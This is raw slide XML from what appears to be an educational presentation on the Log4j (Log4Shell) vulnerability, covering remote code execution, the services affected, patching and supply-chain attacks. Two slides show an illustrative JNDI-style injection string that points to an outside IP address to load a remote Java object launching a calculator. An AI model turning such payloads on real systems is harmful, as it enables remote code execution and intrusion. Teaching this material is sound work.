            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 2" descr="Windows 10 Help Forums">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FDD676C-C4ED-8C84-13E3-DABC4BC162D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88004" y="685456"/>
            <a:ext cx="693915" cy="103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15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ED6379-A417-9DE3-DD01-61FD6F1CBA9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606DCEDA-3C01-1E3E-145B-EFE277256084}"/>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203667CA-7471-2E3C-DEB4-10E51E926EA7}"/>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726B80BB-3AF8-2846-241B-ED1C56F01F9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62DBFF14-4F72-4285-DE25-68376521F975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC0B272-B551-ACA7-D88D-BC5DFC98A3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F2A9C6C7-C98C-9ACA-E2D8-9431EDE20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33400"/>
            <a:ext cx="9610725" cy="5121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C4BBD1A-4A23-0999-33EA-B4ADC35B3419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4152900"/>
            <a:ext cx="5181600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="7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4DCE855-D736-2252-7DC3-EC9D60C2B3CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4171950"/>
            <a:ext cx="5285421" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;EvilPl4yer&gt; Hello world!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;EvilPl4yer&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${jdni:12.123.58.9/calc}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="Windows 10 Help Forums">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A344359-B0ED-2CF9-D304-6B00C2968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706" y="750302"/>
            <a:ext cx="2100625" cy="31480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uld someone make the League of Legends &quot;Missing Ping&quot; into a transparent  gif? : r/PhotoshopRequest">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863C5933-BB65-293E-1D58-A6229F8328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3390900"/>
            <a:ext cx="712144" cy="70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68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913A3B5-1F32-E6AB-10AB-A0CFF1EE49F9}"/>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A93AB140-E7C6-EECC-8510-5B6F643374E5}"/>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1C118915-6DEA-721F-AAA3-B1501C6ACB5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93DD0A67-D4EA-3808-D559-1A617784B8A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09450B0C-CB2B-D891-4826-7C9DFE22BCE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0335BFE8-922A-8757-D9C2-5408875197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C4992050-223E-5127-971B-B2C669F9F2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1860BFBF-EA28-AA54-3968-BB904FF0AD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B5232CBA-AE23-E878-0365-5AC89CBFA5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3B0E9E59-99F0-0EF2-3C8E-D405ECB1E46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3EEA067-D7A6-09A1-FC8A-297C2191785B}"/>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4DB311-7094-73DC-4F00-D7DE926B73AA}"/>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BC6BEE3D-91B8-25B4-B7E6-581C1BEF63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144E009B-983E-EF27-2D09-86A4F33A493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246A017B-D70F-2B78-E2E3-EFA42F617FB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5F4F4B6E-E408-5F23-41EE-37F8CF49BAA0}"/>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76DDD0-4DA0-9CE9-5BAE-0B5C6C634A9F}"/>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F1697879-A03F-177A-3991-58A0408A745B}"/>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2A3E7EF6-6633-ADF0-F37E-EA70DE27E042}"/>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AC037613-9C2B-DF24-5678-58FDCC811C6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BA3802F7-2440-D22E-223F-02FBA69639E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790596" y="1763428"/>
            <a:ext cx="2416046" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="282821"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${jdni:12.123.58.9/calc}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle: Rounded Corners 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F105189-FD0F-04A0-A24C-526EAE018F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078480" y="2976584"/>
            <a:ext cx="1045661" cy="103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A6E4227-DE84-68B7-44CA-3B5607EC2D8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3181155"/>
            <a:ext cx="1937373" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Object that Summons a calculator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Calculator - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56CEFA31-6088-D80D-4FEA-4953173626C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9653" y="3122240"/>
            <a:ext cx="747594" cy="74759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87AFBF3-FF42-78FE-2F14-862503B06AF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="12261"/>
            <a:ext cx="6119812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12.123.58.9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 2" descr="Windows 10 Help Forums">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AED1B7-7D9E-440E-5770-05158F8DCC1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88004" y="685456"/>
            <a:ext cx="693915" cy="10399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6503319-4D52-8003-F4D8-35EF0006C985}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3524355" y="3352620"/>
              <a:ext cx="4167000" cy="605160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="Ink 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76503319-4D52-8003-F4D8-35EF0006C985}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId12"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3488355" y="3316620"/>
                <a:ext cx="4238640" cy="676800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBD01B1-873B-B254-982C-2807A21E90E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4312516"/>
            <a:ext cx="12115817" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> code from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> location was loaded and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> on the victim’s machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A034CAC8-FEA6-A525-3A83-F3A5F0B6D1CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024102" y="5014983"/>
            <a:ext cx="9672841" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Remote Code Execution (RCE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> One of the scariest vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A73E2A3B-C201-9965-E6FA-C7F220F4C8A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525" y="5662390"/>
            <a:ext cx="11360802" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This code could download malware, steal information, delete stuff, mine crypto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135688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1BF08B0-BF45-7BD4-4E48-E9446D18515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377E99E1-05E3-A564-FE2F-D88CA7039BE8}"/>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AA073D91-DA3A-CE11-A841-3F7ED6784E46}"/>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A87D2D5A-2B50-8A9D-4DD1-3BC6A5127667}"/>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A2B91198-22B0-7EFA-EAD6-DFB9DBD12F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABE0402-6516-36C7-6078-702464685D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E09473-E2C5-F193-8749-0866D147594E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="3499676" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Log4J Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0707967-2B89-9B8A-E3E9-E13098DDC60B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1289154"/>
            <a:ext cx="8610600" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Many organizations and services use Log4J to log information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>AWS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>iCloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Steam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cloudflare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>All were potentially vulnerable to RCE attacks (~93% of cloud environments were affected)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 2" descr="Log4j - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB185F8F-8C2A-25C5-6F0C-E3EFF1AC98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99892" y="62400"/>
            <a:ext cx="2597175" cy="10740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1D17298-CF90-8CC2-BC17-444341158938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="3962400"/>
            <a:ext cx="5226111" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“arguably the most severe vulnerability ever”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="Log4Shell, as explained by Metaphor and Memes! | by Jude Allred | Dev Genius">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD03A19-1061-6201-6026-5818CCB24D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0552" y="1459143"/>
            <a:ext cx="3955090" cy="42962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A9F5175-120E-0B64-C5E4-5B657E34C9B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="4598776"/>
            <a:ext cx="4043094" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Patch came out several days later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA53DEA-FCD4-AFA7-8D71-A7A4E9A64554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="5254291"/>
            <a:ext cx="7010400" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Supply-Chain Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>- an attack that targets a trusted third-party vendor that important services rely on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84710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AA7A407-FDE2-9EEC-128C-8742DAE2D6F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420A9385-0053-D8F4-8F48-5EB2826C932E}"/>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61A97D24-0638-8F7F-7811-9305DF6087D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9E3F64DE-065F-F57B-22FA-33BDF680ACA0}"/>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2C81B89C-BAB5-F2F0-F932-3C3868BFE751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{673A1457-A817-597D-BAE1-9FEC7FCFB2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9C3E5143-74F9-F149-3604-F9FE1287C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33400"/>
            <a:ext cx="9610725" cy="51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422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A75A7B6-012B-FC62-88DC-772248809702}"/>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2BE05804-DE67-EA2B-B562-F0D51E50CDB5}"/>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B9F2B275-A96D-594F-FEEA-48491FA93A9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716DB100-DE23-D532-94F9-F1E40C06EC72}"/>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EF33A6C1-68F0-27B0-E80C-8E29356C6EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5163954D-9763-C6E6-F9C1-0E67B90254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266A78-0D6C-747F-31E8-17573F4EED61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="3499676" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Log4J Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 2" descr="Log4j - Wikipedia">
